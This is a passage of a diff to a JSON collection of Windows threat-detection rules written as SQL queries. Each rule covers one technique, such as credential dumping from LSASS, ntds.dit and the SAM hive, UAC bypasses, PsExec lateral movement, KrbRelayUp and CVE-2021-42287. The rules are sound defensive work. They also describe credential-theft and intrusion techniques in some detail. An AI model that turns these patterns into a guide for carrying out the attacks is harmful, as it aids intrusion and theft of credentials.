"filename": "win_security_susp_scheduled_task_creation.yml" }, { - "title": "ISO File Created Within Temp Folders", - "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", - "status": "experimental", - "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", - "author": "@sam0x90", + "title": "Operation Wocao Activity - Security", + "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "status": "test", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" ], - "filename": "file_event_win_iso_file_mount.yml" + "filename": "win_security_apt_wocao.yml" }, { - "title": "Suspicious MSExchangeMailboxReplication ASPX Write", - "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", + "title": "Suspicious Computer Account Name Change CVE-2021-42287", + "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", "status": "test", - "description": "Detects suspicious 
activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_exchange_aspx_write.yml" + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" }, { - "title": "UAC Bypass Using Windows Media Player - File", - "id": "68578b43-65df-4f81-9a9b-92f32711a951", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Service Installed By Unusual Client - Security", + "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "status": "experimental", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND 
TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" ], - "filename": "file_event_win_uac_bypass_wmp.yml" + "filename": "win_security_service_installation_by_unusal_client.yml" }, { - "title": "Suspicious NTDS.DIT Creation", - "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", - "status": "test", - "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Clip - Security", + "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' 
ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "file_event_win_ntds_dit.yml" + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" }, { - "title": "NPPSpy Hacktool Usage", - "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", - "status": "test", - "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", - "author": "Florian Roth (Nextron Systems)", + "title": "KrbRelayUp Attack Pattern", + "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "status": "experimental", + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.credential_access" ], "falsepositives": [ 
@@ -36910,1242 +36932,1220 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_nppspy.yml" + "filename": "win_security_susp_krbrelayup.yml" }, { - "title": "New Outlook Macro Created", - "id": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", + "title": "Suspicious PsExec Execution", + "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "@ScoubiMtl", + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "User genuinely creates a VB Macro for their email" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" ], - "filename": "file_event_win_office_outlook_macro_creation.yml" + 
"filename": "win_security_susp_psexec.yml" }, { - "title": "VsCode Powershell Profile Modification", - "id": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", - "status": "experimental", - "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "AD User Enumeration", + "id": "ab6bffca-beff-4baa-af11-6733f296d57a", + "status": "test", + "description": "Detects access to a domain user from a non-machine account", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Legitimate use of the profile by developers or administrators" + "Administrators configuring new users." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Microsoft.VSCode\\_profile.ps1' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND ObjectType LIKE '%bf967aba-0de6-11d0-a285-00aa003049e2%' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_vscode_powershell_profile.yml" + "filename": "win_security_ad_user_enumeration.yml" }, { - "title": "Rclone Config File Creation", - "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", + "title": "Tap Driver Installation - Security", + "id": "9c8afa4d-0022-48f0-9456-3712466f9701", "status": "test", - "description": "Detects Rclone config file being created", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Well-known TAP software installation. 
Possible preparation for data exfiltration using tunnelling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ "attack.exfiltration", - "attack.t1567.002" + "attack.t1048" ], "falsepositives": [ - "Legitimate Rclone usage (rare)" + "Legitimate OpenVPN TAP insntallation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%tap0901%' ESCAPE '\\')" ], - "filename": "file_event_win_rclone_exec_file.yml" + "filename": "win_security_tap_driver_installation.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - File", - "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "title": "Azure AD Health Monitoring Agent Registry Keys Access", + "id": "ff151c33-45fa-475d-af4f-c2f93571f4fe", "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 
'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Online\\\\Reporting\\\\MonitoringAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_msconfig_gui.yml" + "filename": "win_security_aadhealth_mon_agent_regkey_access.yml" }, { - "title": "OneNote Attachment File Dropped In Suspicious Location", - "id": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", + "title": "LSASS Access from Non System Account", + "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", "status": "experimental", - "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. 
This could be a sign of attackers abusing OneNote attachments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate usage of \".one\" or \".onepkg\" files from those locations" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.one' ESCAPE '\\' OR TargetFilename LIKE '%.onepkg' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_office_onenote_files_in_susp_locations.yml" + "filename": "win_security_lsass_access_non_system_account.yml" }, { - "title": "Suspicious LNK Double Extension Files", - "id": "3215aa19-f060-4332-86d5-5602511f3ca8", - "status": "experimental", - "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the 
fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Remote Service Activity via SVCCTL Named Pipe", + "id": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", + "status": "test", + "description": "Detects remote service activity via remote access to the svcctl named pipe", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1036.007" + "attack.lateral_movement", + "attack.persistence", + "attack.t1021.002" ], "falsepositives": [ - "Users creating a shortcut on e.g. desktop" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.lnk' ESCAPE '\\' AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\PowerPoint%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'svcctl' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_lnk_double_extension.yml" + "filename": 
"win_security_svcctl_remote_service.yml" }, { - "title": "CrackMapExec File Creation Patterns", - "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", - "status": "experimental", - "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "title": "Reconnaissance Activity", + "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "status": "test", + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" ], "falsepositives": [ - "Unknown" + "Administrator activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' 
ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" ], - "filename": "file_event_win_crackmapexec_patterns.yml" + "filename": "win_security_susp_net_recon_activity.yml" }, { - "title": "Suspicious Files in Default GPO Folder", - "id": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", - "status": "experimental", - "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", - "author": "elhoim", + "title": "SAM Registry Hive Handle Request", + "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "status": "test", + "description": "Detects handles requested to SAM registry hive", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.t1036.005", - "attack.defense_evasion" + "attack.discovery", + "attack.t1012", + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Policies\\\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" ], - "filename": "file_event_win_susp_default_gpo_dir_write.yml" + "filename": 
"win_security_sam_registry_hive_handle_request.yml" }, { - "title": "Created Files by Microsoft Sync Center", - "id": "409f8a98-4496-4aaa-818a-c931c0a8b832", - "status": "experimental", - "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", - "author": "elhoim", + "title": "Processes Accessing the Microphone and Webcam", + "id": "8cd538a4-62d5-4e83-810b-12d41e428d6e", + "status": "test", + "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" + "attack.collection", + "attack.t1123" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4663') AND (ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\microphone\\\\NonPackaged%' ESCAPE '\\' OR ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\webcam\\\\NonPackaged%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_creation_by_mobsync.yml" + "filename": "win_security_camera_microphone_access.yml" }, { - "title": "Writing Local Admin Share", - "id": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", - "status": "experimental", - "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", - "author": "frack113", + "title": "Persistence and Execution at Scale via GPO Scheduled Task", + "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "status": "test", + "description": "Detect lateral 
movement using GPO scheduled task, usually used to deploy ransomware at scale", + "author": "Samir Bousseaden", "tags": [ + "attack.persistence", "attack.lateral_movement", - "attack.t1546.002" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\\\\\127.0.0%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" ], - "filename": "file_event_win_writing_local_admin_share.yml" + "filename": "win_security_gpo_scheduledtasks.yml" }, { - "title": "Suspicious Unattend.xml File Access", - "id": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", + "title": "WMI Persistence - Security", + "id": "f033f3f3-fd24-4995-97d8-a3bb17550a88", "status": "test", - "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. 
They are used to store credentials/answers during the unattended windows install process\n", - "author": "frack113", + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "tags": [ - "attack.credential_access", - "attack.t1552.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Unknown (data set is too small; further testing needed)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\unattend.xml' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'WMI Namespace' AND ObjectName LIKE '%subscription%' ESCAPE '\\')" ], - "filename": "file_event_win_access_susp_unattend_xml.yml" + "filename": "win_security_wmi_persistence.yml" }, { - "title": "Suspicious Scheduled Task Write to System32 Tasks", - "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", - "status": "test", - "description": "Detects the creation of tasks from processes executed from suspicious locations", - "author": "Florian Roth (Nextron Systems)", + "title": "Addition of Domain Trusts", + "id": "0255a820-e564-4e40-af2b-6ac61160335c", + "status": "stable", + "description": "Addition of domains is seldom and should be verified for legitimacy.", + "author": "Thomas Patzke", "tags": [ "attack.persistence", - "attack.execution", - "attack.t1053" + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Legitimate extension of domain structure" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" + "SELECT * 
FROM logs WHERE (Channel = 'Security' AND EventID = '4706')" ], - "filename": "file_event_win_susp_task_write.yml" + "filename": "win_security_susp_add_domain_trust.yml" }, { - "title": "EVTX Created In Uncommon Location", - "id": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", + "title": "DiagTrackEoP Default Login Username", + "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", "status": "experimental", - "description": "Detects the creation of new files with the \".evtx\" extension in non-common locations. Which could indicate tampering with default evtx locations in order to evade security controls", - "author": "D3F7A5105", + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Backup activity" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.evtx' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Containers\\\\BaseImages\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dllhost.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" ], - 